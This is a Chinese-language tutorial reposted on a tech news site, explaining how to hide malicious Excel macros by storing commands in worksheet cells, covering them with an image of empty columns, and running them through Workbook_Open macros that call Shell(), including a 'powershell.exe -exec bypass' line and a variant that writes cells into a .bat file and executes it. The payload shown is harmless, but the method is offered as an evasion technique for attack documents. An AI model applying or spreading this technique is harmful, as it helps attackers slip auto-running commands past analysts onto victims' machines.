如何在Excel中更好地隐藏恶意宏代码
你可能会问,为什么不简单地使用实际上不涉及工作簿的代码,以及主要原因是避免网络流量。当然,你可以简单地添加宏,这些宏会将每行代码添加到一个新文件中,以避免网络流量,但是这样做会使活动对于任何分析文档的人来说都是显而易见的,他们会在查看时立即看到新的代码行宏。使用这种方法,它使得对恶意文档的分析稍微困难一些,但是当然不是很多。
注意:仅对文档运行oledump或olevba之类的工具将返回宏。
此时你会看到,该宏正在从特定列中提取代码并使用Shell()执行该代码,但该代码显然非常可疑:
而且,如果我们导航到代码所在的BG1,我们不会立即看到任何可疑的东西:但是,如果将鼠标悬停在BG1上(或者稍微靠近一下并注意到未对齐的列),那么你会看到在代码上覆盖了一个图像:
显然,更有耐心的人可以完善空列的屏幕截图,并将其覆盖在代码顶部以使其不那么引人注意。揭示从工作表中提取的代码的另一种方法是使用MsgBox:
1. 一组要覆盖在代码顶部的空列的屏幕截图,例如:
2. 从工作簿中提取代码并运行数据的宏:
- Private Sub Workbook_Open()
- Data = Sheet1.Range("BG1")
- Shell(Data)
- End Sub
Data = Sheet1.Range("BG1")仅查看位于BG1的行,提取该行中的所有内容并将其放在变量Data中。
3. 打开文档并在用户单击“启用内容”后将提取并执行的代码。
- powershell.exe -exec bypass -C echo "Hello world" > C:\Users\Desktop\Conduct\Desktop\test.txt
将代码插入所需的任何列后,只需将空列的图像插入代码上方(插入>插图>图片)。
然后将宏插入ThisWorkbook并更改Range()部分以与你的列匹配。因此,如果你将数据插入A列并且位于第一行,它就是Range("A1")。
将多行写入文件
向文件写入多行只是小菜一碟,只需要添加几行代码即可。
使用的宏代码如下所示:
- Private Sub Workbook_Open()
- 1. Dim Path As String
- 2. Dim FileNumber As Integer
- 3. FileNumber = FreeFile
- 4. Data = Sheet1.Range("BG1")
- 5. Data2 = Sheet1.Range("BG2")
- 6. Path = "test.bat"
- 7. Open Path For Output As FileNumber
- 8. Print #FileNumber, Data
- 9. Print #FileNumber, Data2
- 10. Close FileNumber
- 11. Shell(Path)
- End Sub
第1-3行是静态的,保持原样,它们只是定义使用的变量。第4-6行是动态的。你将需要根据excel工作表将4和5中的字符串更改为代码所在的位置。将第6行更改为所需的文件路径。
第7-9行也是动态的,它们仅打开文件并将已提取的数据写入文件。特别是第8和9行是负责将数据写入文件的行。
只需将要写入文件的代码插入到工作簿中,并记下该文件所在的列和行,并更改Data&Data1变量以与你的列和行匹配(如果需要的话,添加更多的变量)。然后,将工作簿中的代码与空行的屏幕截图叠加,然后开始就可以了!
低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。
持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。
转载内容版权归作者及来源网站所有,本站原创内容转载请注明来源。
- 上一篇
开源作者为恰饭引起群嘲
看到一个开源作者说自己的框架项目在 GitHub 一年 3134 次提交,靠项目也已经月入5万,通文档付费做的盈利。但这作者的系列操作太骚了,被喷的也挺惨。 评论大概是说作者通过删 issues 增加付费入群咨询人数,隐藏 git,不让看 commit 质量(但作者自己说是有代码洁癖)。花钱刷 star,想通过开源的幌子打广告最后实现财富自由,帖子还美名其曰开源商业化的感悟,这是不是典型的又当又立? 链接:https://v2ex.com/t/711701 开源的目的大多都是为了走向财富自由,爱好只是一方面,可有些人偏偏不知足,把白嫖当成了理所应当,后来我释怀了,别人骂你别听,别人夸你别信,有些人只看到别人标星迅速增长,没看到别人的努力和付出,一个新生框架的出现总会加速一些老旧框架的灭亡,面对竞争对手的抹黑,vue-admin-beautiful 四处树敌,我也得到了惨痛的教训,但是很欣慰 vue-admin-beautiful-pro 版本月收入已经稳定到了 5 万元左右,开源版演示网站月浏览量已经超过了 200 万,月访问公网 IP 超过了 5 万,github 一年 3134 次...
- 下一篇
隐私保护之殇:数据匿名也有“bug”?
曾经,“在互联网上,没人知道你是一条狗。” 现在,“你站在桥上看风景,看风景的人在楼上看着你。” 我们无处藏身。 因一场不可思议的隐私泄露,Netflix曾被一位同性恋用户起诉。 2006年,该公司公布了大约来自50万用户的一亿条租赁记录,其中包括用户的评分和评分日期,并悬赏百万美金,希望吸引工程师通过软件设计来提高其电影推荐系统的精准度。虽然Netflix做出此举前,已经对数据进行了匿名化处理,但是这名“匿名”同性恋用户还是被认出。 匿名化也保护不了隐私数据?在数据容易裸奔的科技时代,匿名化刚给大家吃了定心丸,“打脸”来得这么快? 事实上,匿名与隐私从理论概念上来讲完美融合,但是从技术及应对方案上来看,融合之路并非想象中那样简单。 匿名化的前世今生 数据匿名的社会意识应该是近几年才日渐扩散的,但其实来自技术层面的畅想与实践早就开始了。 实验室总是先走一步,1997年,美国学者Samarati和Sweeney提出了k-anonymity匿名模型,为后续各种技术解决方案的涌现开了先河。当然,届时,数据匿名这个话题更多是停留在技术圈内的狂欢。 随着大数据、智能技术近年的发展与渗透,数据泄露...
相关文章
文章评论
共有0条评论来说两句吧...
文章二维码
点击排行
推荐阅读
最新文章
- CentOS8安装Docker,最新的服务器搭配容器使用
- CentOS7编译安装Cmake3.16.3,解决mysql等软件编译问题
- SpringBoot2整合MyBatis,连接MySql数据库做增删改查操作
- CentOS7,CentOS8安装Elasticsearch6.8.6
- Hadoop3单机部署,实现最简伪集群
- Docker使用Oracle官方镜像安装(12C,18C,19C)
- CentOS8编译安装MySQL8.0.19
- SpringBoot2全家桶,快速入门学习开发网站教程
- Springboot2将连接池hikari替换为druid,体验最强大的数据库连接池
- SpringBoot2配置默认Tomcat设置,开启更多高级功能